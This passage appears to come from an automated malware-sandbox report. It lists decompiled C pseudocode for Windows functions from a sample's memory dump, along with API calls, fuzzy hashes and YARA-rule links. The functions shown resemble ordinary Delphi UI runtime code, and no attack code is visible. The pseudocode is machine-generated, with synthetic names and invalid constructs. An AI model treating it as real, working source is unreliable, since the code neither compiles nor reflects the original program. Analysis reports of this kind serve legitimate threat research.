					_t82 =  *0x486cdc; // 0x40756c
					E00406520(_t82,  &_v344);
					E0040A0EC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
				}
				_pop(_t101);
				 *[fs:eax] = _t101;
				_push(E0040A686);
				E00404320( &_v372);
				E00404344( &_v344, 3);
				return E00404320( &_v8);
			}

































                                                                                0x0040a4c4
                                                                                0x0040a4d1
                                                                                0x0040a4d7
                                                                                0x0040a4dd
                                                                                0x0040a4e3
                                                                                0x0040a4e9
                                                                                0x0040a4ee
                                                                                0x0040a4ef
                                                                                0x0040a4f4
                                                                                0x0040a4f7
                                                                                0x0040a4fd
                                                                                0x0040a504
                                                                                0x0040a518
                                                                                0x0040a51d
                                                                                0x0040a506
                                                                                0x0040a509
                                                                                0x0040a50e
                                                                                0x0040a50e
                                                                                0x0040a522
                                                                                0x0040a52f
                                                                                0x0040a53b
                                                                                0x0040a5f7
                                                                                0x0040a5fd
                                                                                0x0040a607
                                                                                0x0040a60d
                                                                                0x0040a614
                                                                                0x0040a61a
                                                                                0x0040a630
                                                                                0x0040a635
                                                                                0x0040a647
                                                                                0x0040a55e
                                                                                0x0040a561
                                                                                0x0040a567
                                                                                0x0040a57f
                                                                                0x0040a590
                                                                                0x0040a59b
                                                                                0x0040a5a1
                                                                                0x0040a5ab
                                                                                0x0040a5b1
                                                                                0x0040a5b8
                                                                                0x0040a5be
                                                                                0x0040a5d4
                                                                                0x0040a5d9
                                                                                0x0040a5eb
                                                                                0x0040a5f0
                                                                                0x0040a650
                                                                                0x0040a653
                                                                                0x0040a656
                                                                                0x0040a661
                                                                                0x0040a671
                                                                                0x0040a67e

                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A67F), ref: 0040A52F
                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A67F), ref: 0040A551
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                • String ID: lu@
                                                                                • API String ID: 902310565-2585274229
                                                                                • Opcode ID: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction ID: 1868f2d57648088d78e42551569d2a182e29cfcd79893dd67f987c243af7d502
                                                                                • Opcode Fuzzy Hash: 7b17a811859c93707dfb15206b41d5fa76ba35a1cd5d73a52b60511870c90dc5
                                                                                • Instruction Fuzzy Hash: BD411730900658DFDB60DF64CC81BDAB7F4AB49304F4144EAE508AB295D778AE84CF55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004489F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E004489F4(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x487bf0; // 0x22e0e50
					E00425F8C(_t34,  &_v24);
					_push(_t69);
					_push(0x448af2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E004486F8(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x448af9);
							_t40 =  *0x487bf0; // 0x22e0e50
							return E00425F84(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x487bf0; // 0x22e0e50
					E00425F8C(_t42,  &_v8);
					_push(_t69);
					_push(0x448ac7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E004488A0( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x448ace);
					_t48 =  *0x487bf0; // 0x22e0e50
					return E00425F84(_t48);
				}
				L14:
			}


















                                                                                0x004489f5
                                                                                0x004489f7
                                                                                0x004489fb
                                                                                0x004489fd
                                                                                0x00448a07
                                                                                0x00448a10
                                                                                0x00448b0f
                                                                                0x00448a16
                                                                                0x00448a20
                                                                                0x00448a22
                                                                                0x00448a22
                                                                                0x00448a32
                                                                                0x00448a34
                                                                                0x00448a34
                                                                                0x00448a3e
                                                                                0x00448a40
                                                                                0x00448a40
                                                                                0x00448a4c
                                                                                0x00448a52
                                                                                0x00448a57
                                                                                0x00448a5e
                                                                                0x00448a5f
                                                                                0x00448a64
                                                                                0x00448a67
                                                                                0x00448a6a
                                                                                0x00448a6a
                                                                                0x00448a7c
                                                                                0x00448a83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00448ad2
                                                                                0x00448adc
                                                                                0x00448adf
                                                                                0x00448ae2
                                                                                0x00448ae7
                                                                                0x00448af1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00448ad2
                                                                                0x00448a88
                                                                                0x00448a8d
                                                                                0x00448a94
                                                                                0x00448a95
                                                                                0x00448a9a
                                                                                0x00448a9d
                                                                                0x00448aac
                                                                                0x00448ab1
                                                                                0x00448ab4
                                                                                0x00448ab7
                                                                                0x00448abc
                                                                                0x00448ac6
                                                                                0x00448ac6
                                                                                0x00000000

                                                                                APIs
                                                                                • GetKeyState.USER32(00000010), ref: 00448A18
                                                                                • GetKeyState.USER32(00000011), ref: 00448A2A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: State
                                                                                • String ID:
                                                                                • API String ID: 1649606143-3916222277
                                                                                • Opcode ID: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction ID: 2f67ee1c30486cca61a85eaf8b30acdb55de4a75bb1a0bb337f63a262a7cdb16
                                                                                • Opcode Fuzzy Hash: 760088a0574d20811a064ff9e2c06d33e914e5721c87f6c8f0373b8d15e519a0
                                                                                • Instruction Fuzzy Hash: 5931E534A04348EFEB11DBA5D85569DB7F5EB48708F5584BFE800B7291EBB85A00C758
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424428, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E00424428(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t77;
				void* _t78;
				intOrPtr _t79;
				intOrPtr _t80;

				_t77 = _t78;
				_t79 = _t78 + 0xfffffff8;
				_v8 = __eax;
				_v12 = E00403584(1);
				_push(_t77);
				_push(0x4244af);
				_push( *[fs:eax]);
				 *[fs:eax] = _t79;
				 *((intOrPtr*)(_v12 + 8)) = __edx;
				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
				_t80 = _t79 + 0xc;
				 *((char*)(_v12 + 0x70)) = _a8;
				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
				}
				_t62 =  *0x4120e4; // 0x412130
				 *((intOrPtr*)(_v12 + 0x6c)) = E00403764(_a4, _t62);
				_pop(_t64);
				 *[fs:eax] = _t64;
				_push(0x487a44);
				L00406840();
				_push(_t77);
				_push(0x42450f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t80;
				E00422EBC( *((intOrPtr*)(_v8 + 0x28)));
				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
				E00422EB8(_v12);
				_pop(_t67);
				 *[fs:eax] = _t67;
				_push(E00424516);
				_push(0x487a44);
				L00406988();
				return 0;
			}












                                                                                0x00424429
                                                                                0x0042442b
                                                                                0x00424435
                                                                                0x00424444
                                                                                0x00424449
                                                                                0x0042444a
                                                                                0x0042444f
                                                                                0x00424452
                                                                                0x00424458
                                                                                0x0042445e
                                                                                0x00424471
                                                                                0x00424471
                                                                                0x00424479
                                                                                0x00424483
                                                                                0x0042448e
                                                                                0x0042448e
                                                                                0x00424494
                                                                                0x004244a2
                                                                                0x004244a7
                                                                                0x004244aa
                                                                                0x004244c6
                                                                                0x004244cb
                                                                                0x004244d2
                                                                                0x004244d3
                                                                                0x004244d8
                                                                                0x004244db
                                                                                0x004244e4
                                                                                0x004244ef
                                                                                0x004244f2
                                                                                0x004244f9
                                                                                0x004244fc
                                                                                0x004244ff
                                                                                0x00424504
                                                                                0x00424509
                                                                                0x0042450e

                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(00487A44,00000000,?,?), ref: 004244CB
                                                                                • RtlLeaveCriticalSection.KERNEL32(00487A44,00424516,00487A44,00000000,?,?), ref: 00424509
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave
                                                                                • String ID: 0!A
                                                                                • API String ID: 3168844106-1450072167
                                                                                • Opcode ID: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction ID: 58ae4afe19b813cdd8764f3c44f7d698b9faef3fda2e75d9dafaa0c865d1a70e
                                                                                • Opcode Fuzzy Hash: 0edc17d4ed0b1c1ab8b1ba459e1a3a70054d6c8da7edbbee95644b22a89fcf66
                                                                                • Instruction Fuzzy Hash: 9421A175A04304AFC701DF69D89198DBBF5FB4C720B6281AAE804A7751C674EE80CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00435A5C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00435A5C(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414000( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00413FA4(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435040(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                                0x00435a65
                                                                                0x00435a72
                                                                                0x00435a85
                                                                                0x00435a89
                                                                                0x00435ad9
                                                                                0x00435ad9
                                                                                0x00435a8b
                                                                                0x00435a8b
                                                                                0x00435a8b
                                                                                0x00435a95
                                                                                0x00435a9b
                                                                                0x00000000
                                                                                0x00435aa3
                                                                                0x00435aa8
                                                                                0x00435abc
                                                                                0x00435ad3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00435ad3
                                                                                0x00000000
                                                                                0x00435ad5
                                                                                0x00435ad5
                                                                                0x00000000
                                                                                0x00435a8b
                                                                                0x00435add
                                                                                0x00435ae6

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Rect$EqualIntersect
                                                                                • String ID: @
                                                                                • API String ID: 3291753422-2766056989
                                                                                • Opcode ID: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction ID: a4dc38a6c8dfb3a5b63c1f0ba833f3846fe2b2ebe5734ae6dc21ff9bf713c91f
                                                                                • Opcode Fuzzy Hash: 5875d3f469a07d2fec264fccf843e68af22faf804a9a75e07dadbcdbde7529ca
                                                                                • Instruction Fuzzy Hash: 95118C31A046489BC701EA6DC894BDF7BEC9F48318F0402A6FD04EB382D779DD058794
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044C690, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 69%
                                                                                			E0044C690(intOrPtr __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _t13;
				intOrPtr _t17;
				intOrPtr _t24;
				char _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t31;
				void* _t32;
				intOrPtr _t33;

				_t31 = _t32;
				_t33 = _t32 + 0xfffffff4;
				_v8 = 0;
				_t24 =  *0x46bb24; // 0x0
				_v12 = _t24;
				_t25 =  *0x46bb30; // 0x0
				_v16 = _t25;
				 *0x46bb24 = __eax;
				 *0x46bb30 = 0;
				_push(_t31);
				_push(0x44c733);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				_push(_t31);
				_push( *[fs:eax]);
				 *[fs:eax] = _t33;
				EnumThreadWindows(GetCurrentThreadId(), E0044C640, 0);
				_t13 =  *0x46bb30; // 0x0
				_v8 = _t13;
				_pop(_t26);
				 *[fs:eax] = _t26;
				_t27 = 0x44c6fc;
				 *[fs:eax] = _t27;
				_push(0x44c73a);
				_t5 =  &_v16; // 0x42ea72
				 *0x46bb30 =  *_t5;
				_t17 = _v12;
				 *0x46bb24 = _t17;
				return _t17;
			}















                                                                                0x0044c691
                                                                                0x0044c693
                                                                                0x0044c69b
                                                                                0x0044c69e
                                                                                0x0044c6a4
                                                                                0x0044c6a7
                                                                                0x0044c6ad
                                                                                0x0044c6b0
                                                                                0x0044c6b7
                                                                                0x0044c6be
                                                                                0x0044c6bf
                                                                                0x0044c6c4
                                                                                0x0044c6c7
                                                                                0x0044c6cc
                                                                                0x0044c6d2
                                                                                0x0044c6d5
                                                                                0x0044c6e5
                                                                                0x0044c6ea
                                                                                0x0044c6ef
                                                                                0x0044c6f4
                                                                                0x0044c6f7
                                                                                0x0044c717
                                                                                0x0044c71a
                                                                                0x0044c71d
                                                                                0x0044c722
                                                                                0x0044c725
                                                                                0x0044c72a
                                                                                0x0044c72d
                                                                                0x0044c732

                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0044C6DF
                                                                                • EnumThreadWindows.USER32(00000000,0044C640,00000000), ref: 0044C6E5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Thread$CurrentEnumWindows
                                                                                • String ID: rB
                                                                                • API String ID: 2396873506-3432471736
                                                                                • Opcode ID: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction ID: 784cd37228573f0c4d139dee04941cc700bad5c37d42a676d98ffa6d26d47428
                                                                                • Opcode Fuzzy Hash: a2ed862f726dce6ea9b7ab6a43d9daf756f3b3595bf60e5d1b422f0ddc4ac1ab
                                                                                • Instruction Fuzzy Hash: C801C4B4A05704AFE301CF65DC51916BBF8EB8DB10B628476E800D3B60F7746400CE5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042641C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E0042641C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x487abf != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x487aa0; // 0x42641c
					 *0x487aa0 = E00426184(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x487aa0(_a4, _a8, _t19);
				}
				return _t16;
			}













                                                                                0x00426422
                                                                                0x0042642c
                                                                                0x00426456
                                                                                0x0042645f
                                                                                0x00426487
                                                                                0x00426487
                                                                                0x00426461
                                                                                0x00426461
                                                                                0x00426466
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00426466
                                                                                0x0042642e
                                                                                0x00426433
                                                                                0x00426440
                                                                                0x00426452
                                                                                0x00426452
                                                                                0x00426492

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 0042646A
                                                                                • GetSystemMetrics.USER32 ref: 0042647C
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromPoint
                                                                                • API String ID: 1792783759-1072306578
                                                                                • Opcode ID: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction ID: cd85fc9c8645eeba43d65e48dc59c82577749165faf05199f4873ef963c6ea0d
                                                                                • Opcode Fuzzy Hash: d416c4985ba4413774987f096a320964d63c72627901ada663c10769bb17c054
                                                                                • Instruction Fuzzy Hash: 2F01A231305224AFDB006F51EC84B5FBB55EB40758F91442AF9598B612C375DE40C7AC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004262F4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E004262F4(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x487abe != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x487a9c; // 0x4262f4
					 *0x487a9c = E00426184(2, _t14, _t16, _t17, _t18);
					_t19 =  *0x487a9c(_t14, _t17);
				}
				return _t19;
			}












                                                                                0x004262fa
                                                                                0x004262fd
                                                                                0x00426307
                                                                                0x0042632c
                                                                                0x00426335
                                                                                0x0042635c
                                                                                0x0042635c
                                                                                0x00426309
                                                                                0x0042630e
                                                                                0x0042631b
                                                                                0x00426328
                                                                                0x00426328
                                                                                0x00426367

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00426345
                                                                                • GetSystemMetrics.USER32 ref: 00426351
                                                                                  • Part of subcall function 00426184: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00426204
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$AddressProc
                                                                                • String ID: MonitorFromRect
                                                                                • API String ID: 1792783759-4033241945
                                                                                • Opcode ID: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction ID: 2649c8152ff0a4a618a293e30726504c2b2cf717a0c2621c365be1b3126a70b4
                                                                                • Opcode Fuzzy Hash: f6389e7ca689c4f8fe7b67f29ea4c7e91d631a6b7a859c0c381da6731af0c2b2
                                                                                • Instruction Fuzzy Hash: E501A232B041249BDB10CB59FC85B1EB765E741764FA5846BEC08CB603C678DD40CBAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043D724, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 72%
                                                                                			E0043D724(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E00442554(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0043D788(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x43375c
						E0043D514(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x43375c
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L004260FC();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}








                                                                                0x0043d72d
                                                                                0x0043d732
                                                                                0x0043d734
                                                                                0x0043d73f
                                                                                0x0043d741
                                                                                0x0043d744
                                                                                0x0043d748
                                                                                0x0043d74f
                                                                                0x0043d756
                                                                                0x0043d75e
                                                                                0x0043d763
                                                                                0x0043d766
                                                                                0x0043d76a
                                                                                0x0043d76e
                                                                                0x0043d76f
                                                                                0x0043d777
                                                                                0x0043d779
                                                                                0x0043d779
                                                                                0x0043d744
                                                                                0x0043d782

                                                                                APIs
                                                                                  • Part of subcall function 0043D788: 734518F0.COMCTL32(?,00000000,0043D74D,00000000,00000000,00000000), ref: 0043D7A0
                                                                                  • Part of subcall function 0043D514: ClientToScreen.USER32(?,0043D7D0), ref: 0043D52C
                                                                                  • Part of subcall function 0043D514: GetWindowRect.USER32 ref: 0043D536
                                                                                • 73451850.COMCTL32(?,?,\7C,?,00000000,00000000,00000000), ref: 0043D76F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: 73451873451850ClientRectScreenWindow
                                                                                • String ID: \7C$\7C
                                                                                • API String ID: 1718620977-1242633874
                                                                                • Opcode ID: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction ID: a175693acc41a737ad07227ac984dcca9a23f6f09638294ce6bc0965f6750621
                                                                                • Opcode Fuzzy Hash: 365f2af23587cf31549f760d55cd3af2694efc9b2ed9bdd57577858ccde5046b
                                                                                • Instruction Fuzzy Hash: 9DF04F76B00209AB8B10DEAE98C18AEF3ACAB4C214B00817AF918D3301D675ED058B94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004065CD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004065CD(void* __eax, void* __ebx, void* __esi) {
				long _t10;

				 *((intOrPtr*)(__ebx + 0x69)) =  *((intOrPtr*)(__ebx + 0x69)) + __esi;
